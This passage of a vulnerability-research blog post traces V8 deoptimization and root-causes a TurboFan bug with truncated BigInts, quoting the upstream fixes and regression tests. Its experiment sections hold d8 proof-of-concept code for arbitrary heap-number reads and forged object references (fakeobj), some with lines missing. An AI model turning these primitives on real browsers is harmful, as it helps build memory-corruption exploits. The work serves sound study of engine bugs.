// ...

4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rcx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason '(unknown)'
;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason 'wrong name'
;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop


Interestingly (you'll need to also add the --code-comments flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
-- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10


Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
;;; deoptimize at <test.js:3:8>, wrong name


It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
4: captured object #0 (length = 7)
0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
5: 0x002a00000000 ; (literal  6) 42


The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rdx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
-------------------------
0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
-------------------------
0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)


After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>


## Case study : an incorrect BigInt rematerialization

### Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs :

1. parameters
• UseInfo is AnyTagged
2. registers
• UseInfo is AnyTagged
3. the accumulator
• UseInfo is Any
4. a context
• UseInfo is AnyTagged
5. a closure
• UseInfo is AnyTagged
6. the outer frame state
• UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
DCHECK_EQ(5, node->op()->ValueInputCount());
DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
if (propagate()) {
EnqueueInput(node, 2, UseInfo::Any());
} else if (lower()) {
Zone* zone = jsgraph_->zone();
Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
accumulator));
}
}

ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
return SetOutput(node, MachineRepresentation::kTagged);
}


An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node.

static UseInfo AnyTagged() {
return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
}
// Undetermined representation.
static UseInfo Any() {
return UseInfo(MachineRepresentation::kNone, Truncation::Any());
}
// Value not used.
static UseInfo None() {
return UseInfo(MachineRepresentation::kNone, Truncation::None());
}

const char* Truncation::description() const {
switch (kind()) {
// ...
case TruncationKind::kAny:
switch (identify_zeros()) {
case TruncationKind::kNone:
return "no-value-use";
// ...
case kIdentifyZeros:
return "no-truncation (but identify zeros)";
case kDistinguishZeros:
return "no-truncation (but distinguish zeros)";
}
}
// ...
}


If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
queue #7?: no-truncation (but distinguish zeros)
initial #45: no-truncation (but distinguish zeros)
queue #71?: no-truncation (but distinguish zeros)
queue #4?: no-truncation (but distinguish zeros)
queue #62?: no-truncation (but distinguish zeros)
queue #0?: no-truncation (but distinguish zeros)


All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
queue #70?: no-value-use


In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
ProcessInput(node, 0, UseInfo::TruncatingWord64());
SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
return;
}


So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (3rd input), we can say the following :

• the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
• the FrameState doesn't truncate its 2nd input
• the BigIntAsUintN output representation is kWord64

Because the input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node :

  // Converts input {index} of {node} according to given UseInfo {use},
// assuming the type of the input is {input_type}. If {input_type} is null,
// it takes the input from the input node {TypeOf(node->InputAt(index))}.
void ConvertInput(Node* node, int index, UseInfo use,
Type input_type = Type::Invalid()) {
Node* input = node->InputAt(index);
// In the change phase, insert a change before the use if necessary.
if (use.representation() == MachineRepresentation::kNone)
return;  // No input requirement on the use.


So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
accumulator));


Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
DCHECK(type.Is(Type::BigInt()));
return Type::BigInt();
}


As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
// ..
if (rep == MachineRepresentation::kWord64) {
if (type.Is(Type::BigInt())) {
return MachineType::AnyTagged();
}
// ...
}


So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
switch (node->opcode()) {
// ...
case IrOpcode::kFrameState:
case IrOpcode::kStateValues:
case IrOpcode::kObjectState:
return;
// ...


However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated with. The function BuildTranslation will handle the the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
Instruction* instr,
InstructionOperand* op,
MachineType type) {
case Constant::kInt64:
DCHECK_EQ(8, kSystemPointerSize);
if (type.representation() == MachineRepresentation::kWord64) {
literal =
DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
} else {
// When pointers are 8 bytes, we can use int64 constants to represent
// Smis.
DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
DCHECK(smi.IsSmi());
literal = DeoptimizationLiteral(smi.value());
}
break;


This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

### Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
return res;
}
catch(_){ return y}
}

function compileOnce() {
f({x:1.1});
%PrepareFunctionForOptimization(f);
f({x:1.1});
%OptimizeFunctionOnNextCall(f);
return f({x:1.1});
}


When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
4.24


We can get the same primitive using other kind of ignition bytecode handlers such as +, -,/,* or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
3.14


The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

• a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
• in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
• in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
• we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
11: 0x004200000000 ; rcx 66
translating interpreted frame f => bytecode_offset=39, height=64
0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
-------------------------
0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
-------------------------
0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
-> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
[ accumulator -> 66 ]
[ accumulator <- 66 ]
-> 000001B141C5FAA0 @   42 : 26 f9             Star r2
[ accumulator -> 66 ]
[          r2 <- 66 ]
-> 000001B141C5FAA2 @   44 : a9                Return
[ accumulator -> 66 ]


### Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives) .

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var obj = {};
obj[x] = y;
return obj;
}
catch(_){ return y}
}

function compileOnce() {
f("foo");
%PrepareFunctionForOptimization(f);
f("foo");
f("foo");
f("foo");
f("foo");
%OptimizeFunctionOnNextCall(f);
f("foo");
return f("boom"); // deopt reason : wrong name
}


To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
undefined
undefined
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
[object ArrayBuffer]


Et voila! Sweet as!

### Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
void VisitObjectState(Node* node) {
if (propagate()) {
for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
}
} else if (lower()) {
Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
Node* input = node->InputAt(i);
(*types)[i] =
DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
}
NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);


Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
}
}

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
switch (use_info.representation()) {
case MachineRepresentation::kTaggedSigned:
DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}


An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!


An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.

### Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11


However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11


As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
- map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x16a408248f25 <JSArray[0]>
- elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
- length: 4
- properties: 0x16a4080406e1 <FixedArray[0]> {
#length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
}
- elements: 0x16a4080c5f71 <FixedArray[4]> {
0: 1
1: 2
2: 3
3: 4
}


If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008


To get the full address, we need to know the base.

(lldb) register read r13
r13 = 0x000016a400000000


And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we substract 1 to untag the pointer).

(lldb) x/10wx r13+0x080c5f71-1 0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004 0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e 0x16a4080c5f90: 0x00000adc 0x7566280a  Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one. Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer. d8> var a = new ArrayBuffer(0x40); d8> var v = new Uint32Array(a); d8> v[0] = 0x41414141  d8> %DebugPrint(a) DebugPrint: 0x16a4080c7899: [JSArrayBuffer] - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9> - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS] - embedder fields: 2 - backing_store: 0x107314fd0 - byte_length: 64 - detachable - properties: 0x16a4080406e1 <FixedArray[0]> {} - embedder fields = { 0, aligned pointer: 0x0 0, aligned pointer: 0x0 }  (lldb) x/10wx 0x16a4080c7899-1 0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040 0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002 0x16a4080c78b8: 0x00000000 0x00000000  We indeed find the full raw pointer in memory (raw | 00). (lldb) x/2wx 0x0000000107314fd0 0x107314fd0: 0x41414141 0x00000000  # Conclusion We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms. However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying). Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine! Please feel free to contact me on twitter if you've got any feedback or question! Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity) # References ### Technical documents ### Bugs # A journey into IonMonkey: root-causing CVE-2019-9810. 17 June 2019 at 15:00 # A journey into IonMonkey: root-causing CVE-2019-9810. ## Introduction In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox 